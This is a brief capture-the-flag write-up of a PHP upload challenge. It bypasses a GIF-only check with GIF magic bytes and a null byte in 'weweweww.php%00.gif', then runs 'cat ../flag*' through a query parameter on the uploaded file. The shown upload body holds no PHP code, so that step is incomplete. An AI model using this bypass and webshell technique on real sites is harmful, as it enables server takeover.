Given this code:

```
$extension = strtolower(pathinfo($target_dir,PATHINFO_EXTENSION));
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$type = finfo_file($finfo,$files["tmp_name"]);
finfo_close($finfo);
if($extension != "gif" || strpos($type,"image/gif") === false){
echo " Sorry, only gif files are accepted";
$uploadOk = false;
}
$target_dir = strtok($target_dir,chr(0));
if($uploadOk && move_uploaded_file($files["tmp_name"],$target_dir)){
echo "uploaded gif here go see it!";
}
```

We can upload .php file using:

- `.gif` as the extension of file
- Contains magic bytes of GIF file (GIF87a/GIF89a) at beginning
- Contains null byte between `.php` and `.gif`

```
POST / HTTP/1.1
Host: 52.59.124.14:10021
Content-Type: multipart/form-data; boundary=---------------------------1013956662279462726520057537
Content-Length: 398

-----------------------------1013956662279462726520057537
Content-Disposition: form-data; name="fileToUpload"; filename="weweweww.php%00.gif"
Content-Type: application/octet-stream

GIF87a
-----------------------------1013956662279462726520057537
Content-Disposition: form-data; name="submit"

Upload
-----------------------------1013956662279462726520057537--
```

Then open `http://52.59.124.14:10021/images/weweweww.php?c=cat%20../flag*` to get the flag.